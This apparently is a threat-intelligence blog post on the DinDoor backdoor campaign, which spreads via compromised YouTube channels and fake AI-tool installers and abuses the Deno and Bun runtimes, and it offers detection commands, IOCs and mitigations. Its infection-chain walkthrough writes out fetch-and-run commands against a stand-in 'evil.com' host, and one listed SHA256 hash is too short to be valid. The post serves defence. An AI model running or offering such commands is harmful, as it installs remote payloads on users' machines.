Listen to this Post

Introduction:
Cybercriminals are aggressively exploiting the trust of digital creators and tech enthusiasts by leveraging compromised YouTube channels to distribute the DinDoor backdoor. Attackers disguise malicious payloads as popular AI tools and software plugins—including ChatGPT, Claude, AutoTune, and Kontakt—turning legitimate developer platforms like GitHub and SourceForge into weaponized distribution hubs. This sophisticated campaign highlights a growing trend of threat actors abusing alternative JavaScript runtimes, such as Deno and Bun, to bypass traditional security detection methods.
Learning Objectives:
- Understand the infection chain of the DinDoor backdoor, from initial lure to C2 communication.
- Learn how threat actors leverage legitimate developer tools (Deno, Bun, PowerShell) and platforms (GitHub, SourceForge) to evade detection.
- Acquire practical detection and mitigation techniques, including Linux/Windows commands, IOCs, and network analysis.
You Should Know:
- Anatomy of the Attack: How the DinDoor Backdoor is Delivered
The attack chain begins with victims being lured by compromised YouTube channels with AI-generated videos promoting fake installers for AI apps like ChatGPT and Claude. The malicious repositories on GitHub and SourceForge then instruct visitors to open a terminal and paste a command that downloads an MSI installer or a PowerShell script. This script installs legitimate tools like Scoop and WinGet, then uses them to install the Deno runtime. Deno is then used to fetch and run the DinDoor backdoor directly from a remote server, executing the next stage in memory through standard input so it never touches disk.
Step-by-step Guide to Reconstruct the Infection Chain (for defensive analysis):
- Initial Lure: Victims are directed to a GitHub repository via a compromised YouTube channel.
- User Execution: The user is instructed to run a command like `powershell -c “iex (irm http://evil.com/script.ps1)”` or
curl -fsSL http://evil.com/installer.sh | sh. - Tool Installation: The script uses Scoop or WinGet to install the Deno runtime from the official source `https://deno.land/install.ps1`.
4. Payload Fetching: Deno fetches the obfuscated JavaScript payload from a remote server: `deno run -A https://evil.com/payload.js`. - Persistence and C2: The payload sets up persistence via a registry Run key, fingerprints the system, and establishes C2 communication over HTTP port 80 to exfiltrate data.
Linux/Windows Commands for Analysis:
Monitor for suspicious Deno execution (Linux)
ps aux | grep deno
Monitor for fileless execution via stdin (Linux)
lsof -i | grep deno
Windows PowerShell detection for Deno processes
Get-Process deno
Monitor for suspicious PowerShell launching Deno (Windows)
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Where-Object {$_.Message -like 'deno'}
2. Abusing Deno Runtime for Fileless Evasion
Security monitoring often focuses on well-known tools like PowerShell, cmd.exe, WMI, and Node.js. However, Deno is a legitimate developer tool that many security products do not flag, creating a detection gap. Attackers exploit this by executing malicious code entirely in memory, leaving zero forensic artifacts on disk. One sample uses a fake Windows error dialog while a VBScript launcher silently runs the PowerShell payload in the background, passing JavaScript directly to deno.exe as a URI argument so the code executes entirely in memory.
Step-by-step Guide to Detecting Deno Abuse:
- Monitor Process Trees: Any unexpected execution of `deno.exe` as a child of `powershell.exe` or `wscript.exe` should be treated as a high-priority alert.
- Command-Line Inspection: Look for patterns like `deno.exe -A data:application/javascript;base64` or `deno.exe run –allow-all https://`.
3. Network Monitoring: The malware binds a TCP listener on localhost (e.g., port 8080) as a mutex to prevent re-infection. Use `netstat -an | findstr “127.0.0.1:8080″` (Windows) or `ss -tuln | grep 127.0.0.1:8080` (Linux) to detect this activity. - HTTP Logs: Review HTTP logs for distinctive Caddy proxy headers. DinDoor servers exhibit a unique HTTP header signature on port 80, including a doubled Caddy proxy signature, which can identify C2 servers.
Linux/Windows Commands for Analysis:
Detect Deno listening on localhost (Linux)
ss -tuln | grep 127.0.0.1
Monitor Deno network connections (Windows)
netstat -ano | findstr deno
Investigate PowerShell launching Deno (Windows PowerShell)
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Where-Object {$_.Message -match 'deno'}
- The Role of Bun Runtime: A New Evasion Frontier
Recent attacks have also abused the Bun JavaScript runtime to distribute malware. Researchers found that Bun was used to package malicious JavaScript inside the loader’s `.bun` section. Two scripts, `sysreq.js` and memload.js, handled environment checks and communication with attacker infrastructure. Bun allows attackers to create a single binary executable containing both the runtime and malicious code, making detection difficult.
Step-by-step Guide to Analyze Bun-based Malware:
- Extract the Malicious Bun Executable: In a sandbox, run `bun loader.js` and monitor its behavior.
- Check for Packaged Payloads: Use a hex editor or strings tool on the executable to locate the `.bun` section and extract embedded JavaScript.
- Monitor API Calls: The malware uses `VirtualAlloc` and `LoadLibraryA` to inject the stealer into memory.
- Network Detection: Block known C2 domains such as `silent-harvester.cc` and monitor for unusual Bun-related traffic.
Linux/Windows Commands for Analysis:
Extract strings from a Bun executable (Linux)
strings malicious_bun_exe | grep -i "bun|script|payload"
Monitor for Bun processes (Windows)
Get-Process bun
Monitor for suspicious API calls (Windows with Sysmon)
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" | Where-Object {$_.Message -match "VirtualAlloc|LoadLibraryA"}
4. Weaponized Platforms: GitHub and SourceForge
Attackers create counterfeit installers and plugins on GitHub and SourceForge, posing as widely used software like ChatGPT, Claude, AutoTune, Ableton Live, and ZENOLOGY. These platforms lend credibility, making it easier for attackers to deceive users. For example, a malicious project on SourceForge named `officepackage` cloned the appearance and content of Microsoft’s real Office-Addin-Scripts GitHub repository to distribute cryptocurrency miners and clipper malware.
Step-by-step Guide to Identify Malicious Repositories:
- Verify Repository Ownership: Check the account’s creation date, activity, and associated email addresses. Legitimate projects often have well-established histories.
- Review Installation Instructions: Be suspicious of repositories that ask users to run obfuscated commands or download files from outside the platform.
- Analyze Setup Scripts: Examine PowerShell, batch, or shell scripts for signs of downloading Deno, Bun, or other runtimes from unofficial sources.
- Scan Uploaded Files: Use VirusTotal or other sandbox tools to scan MSI and executable files before execution.
Linux/Windows Commands for Analysis:
Use curl to safely inspect the target of a shortened URL (Linux) curl -sI https://github.com/suspicious/repo Use irm in PowerShell to inspect remote script content without execution (Windows) Invoke-RestMethod -Uri https://raw.githubusercontent.com/suspicious/repo/install.ps1 -Method Head
5. Indicators of Compromise (IOCs) and Mitigation
Researchers have identified 20 active C2 servers for DinDoor across 15 autonomous systems, with many using bulletproof hosting providers. The malicious infrastructure uses the Caddy proxy with distinctive headers allowing network-based detection. The primary IOCs include specific domains, IP addresses, file hashes, and registry keys.
Indicators of Compromise:
Domains: - serialmenot[.]com - justtalken[.]com - agilemast3r.duckdns.org - annaionovna[.]com - ineracaspsl[.]site IP Addresses: - 138.124.240.76 - 140.82.18.48 - 199.91.220.142 - 185.218.19.117 File Hashes (SHA256): - 2a09bbb3d1ddb729ea7591f197b5955453aa3769c6fb98a5ef60c6e4b7df23a5 - e2e8516b4f275e8c636620b7377ee3b9f9f47bb0 Registry Keys (Persistence): - HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater
Step-by-step Guide to Mitigation:
- Update EDR Rules: Configure your EDR to monitor for Deno and Bun process creation, especially when spawned by PowerShell or command prompt.
- Block MSI Installation via AppLocker: Use AppLocker or Windows Defender Application Control to restrict MSI execution to trusted publishers.
- Implement Network Filtering: Block outbound connections to the listed C2 domains and IP addresses at the firewall level.
- Enforce PowerShell Logging: Enable PowerShell Script Block Logging and Module Logging to capture suspicious commands.
- Conduct User Awareness Training: Educate users about the risks of downloading software from unverified sources, even from legitimate platforms like GitHub.
Linux/Windows Commands for Mitigation:
Block IP addresses using Windows Firewall
New-NetFirewallRule -DisplayName "Block DinDoor C2" -Direction Outbound -RemoteAddress 138.124.240.76,140.82.18.48 -Action Block
Block IP addresses using iptables (Linux)
sudo iptables -A OUTPUT -d 138.124.240.76 -j DROP
sudo iptables -A OUTPUT -d 140.82.18.48 -j DROP
Search for known malicious file hashes (Windows PowerShell)
Get-ChildItem -Recurse C:\ | Get-FileHash -Algorithm SHA256 | Where-Object {$_.Hash -in "2a09bbb3d1ddb729ea7591f197b5955453aa3769c6fb98a5ef60c6e4b7df23a5","e2e8516b4f275e8c636620b7377ee3b9f9f47bb0"}
What Undercode Say:
- Key Takeaway 1: Attackers are shifting from traditional compiled malware to abusing legitimate developer runtimes like Deno and Bun, enabling fileless execution and evading signature-based detection. This “Bring Your Own Runtime” (BYOR) approach represents a significant evolution in evasion tradecraft.
- Key Takeaway 2: The use of trusted platforms (GitHub, SourceForge) as malware distribution hubs, combined with social engineering via YouTube, leverages user trust to bypass traditional security awareness and perimeter defenses.
Analysis: This campaign marks a critical turning point in threat actor tradecraft. By exploiting legitimate developer tools and platforms, attackers achieve high levels of stealth and persistence. The fileless nature of the infection—executing code entirely in memory without writing to disk—renders many traditional antivirus solutions ineffective. Organizations must shift to behavioral monitoring, focusing on process execution anomalies, network traffic patterns, and command-line arguments. The discovery of 20 active C2 servers using unique HTTP headers demonstrates that even sophisticated threats leave detectable artifacts when proper network telemetry is in place. However, the multi-tenant nature of the infrastructure, shared among ransomware operators, state-sponsored groups, and cybercrime actors, complicates attribution and takedown efforts. This “shared platform” model indicates that defenders face a unified adversary ecosystem rather than isolated threat actors.
Prediction:
The abuse of alternative JavaScript runtimes (Deno, Bun) will accelerate, with more APT groups and cybercriminal gangs adopting BYOR strategies. Expect to see ransomware and infostealer families increasingly distributed via fileless Deno/Bun payloads to evade EDR. Additionally, the weaponization of AI tools and developer platforms as lure vectors will become a standard initial access tactic, forcing security teams to expand detection coverage beyond traditional scripting environments. Organizations that fail to monitor these emerging runtimes will likely face undetected compromises within the next 6–12 months.
▶️ Related Video (70% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Varshu25 Cybercriminals – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]


